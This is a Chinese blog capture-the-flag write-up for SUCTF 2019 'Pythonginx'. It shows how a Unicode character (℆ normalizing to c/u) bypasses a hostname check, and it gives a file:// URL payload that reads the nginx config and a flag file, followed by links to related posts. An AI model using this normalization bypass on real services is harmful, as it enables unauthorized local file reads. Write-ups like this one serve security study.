[SUCTF 2019]Pythonginx

最新推荐文章于 2022-07-16 18:13:24 发布
最新推荐文章于 2022-07-16 18:13:24 发布
阅读量196 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51019270/article/details/114480383
版权

[SUCTF 2019]Pythonginx WP

打开靶机,直接给出了源代码。

在这里插入图片描述

这三个位置不难看出,前两个if都要求url不是suctf.cc,只有第三个要求是suctf.cc才能成功

看了一些大佬们的WP

考点是2019 black hat的一个议题,通俗解释就是在不同的解码方式下,最开始你输入的URL可能会被解码成另一个URL。

℆会被解码为c/u

直接构造

suctf.c℆sr/local/nginx/conf/nginx.conf
//这个是nginx的配置文件

然后读flag就行

http://47de85cb-6ea6-44fb-8b70-ed4b4aa418cf.node3.buuoj.cn/getUrl?url=file://suctf.c%E2%84%82/…/…/…/…/…//usr/fffffflag

/…/…/…//usr/fffffflag

在这里插入图片描述

whitehousezx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
_PE_Format.pdf
03-26
_PE_Form_PE_Format.pdf_PE_Format.pdf_PE_Format.pdfat.pdf_PE_Format.pdf_PE_Format.pdf
python优秀源码2019_SUCTF2019,python源码分析,漏洞原理
weixin_26808023的博客
02-03 498
前言前段时间打的SUCTF2019中有一个题目叫Pythongin思路大概来源于黑帽大会不怎么明白漏洞的原理,就准备复现一下,在复现的过程中出现了很多坑,来记录一下。踩坑过程整个SUCTF2019的源码都已经开源了,地址如下具体题目的分析过程就不再赘述了,感觉师傅们分析的一个比一个详细,我在文末也放了几个师傅的分析的writeup搭建好docker的环境,直接按照文档中的命令可以直接复现成功doc...
[SUCTF 2019]Pythonginx1
qq_63169208的博客
07-16 1280
还是太菜了加油加油
[SUCTF 2019]Pythonginx简单做题思路
EC_Carrot的博客
12-09 193
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 题目还给了个源码 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc':
P3(3)CTF赛制介绍&工具介绍
weixin_43909650的博客
01-26 382
2021-08-29 网安实验-网络协议栈渗透测试之DDOS攻击之CC攻击
时光隧道
08-29 4万+
1.CC攻击 CC之起源 CC = Challenge Collapsar,其前身名为Fatboy攻击,Collapsar(黑洞) 是绿盟科技的一款抗DDOS产品品牌,早期在对抗拒绝服务攻击的领域内具有比较高的影响力和口碑。 因此,此攻击更名为Challenge Collapsar,表示要向黑洞发起挑战。 CC之概述 CC攻击(Challenge Collapsar)是DDOS(分布式拒绝服务)的一种,也是一种常见的网站攻击方法。原理就是攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽,一
nginx uwsgi wsgi django 这些东西究竟是什么关系
u014761344的专栏
10-16 1万+
1 首先nginx 是对外的服务接口,外部liu'la
网络安全实验室CTF练习部分题目(持续更新)
热门推荐
技术学习人生
06-29 8万+
1、脚本关:微笑一下,过关地址:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php 查看源代码: include('flag.php'); $smile = 1; if (!isset ($_GET['^_^'])) $smile = 0; if (preg_match
CTF比赛中关于zip的总结
Fly_鹏程万里
04-16 1万+
前言在CTF比赛的MISC和CRYPTO中,经常要和zip压缩包打交道,这里做一个zip方面的总结。本文中用到的所有文件和工具都可在这个网盘中找到http://pan.baidu.com/s/1bWQxyA 目录隐写篇0x01. 通过进制转换隐藏信息0x02. 在图片中隐藏压缩包(图种)加密篇0x03. 伪加密0x04. 爆破/字典/掩码攻击0x05. 明文攻击0x06. CRC32碰撞格式篇0x...
智能合约逆向心法1(案例篇)——34C3_CTF题目分析
Fly_鹏程万里
11-23 1845
前言 最近笔者想研究了一下智能合约逆向,顺便入门一下逆向的知识,因此打算边学边写,不足之处请多指正欢迎大家一起交流。本篇我们就从一个题目开始。 题目 题目地址 : https://archive.aachen.ccc.de/34c3ctf.ccc.ac/challenges/index.html chaingang send 1505 szabo 457282 babbage 6...
[suctf 2019]EasySQL
最新发布
09-12
[suctf 2019]EasySQL是一个SQL题目,与引用和引用中提到的设置sql_mode有关。具体来说,题目中使用了设置sql_mode=PIPES_AS_CONCAT的语句,这个设置的作用是将"||"操作符解释为字符串的连接操作符而不是或运算符。这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值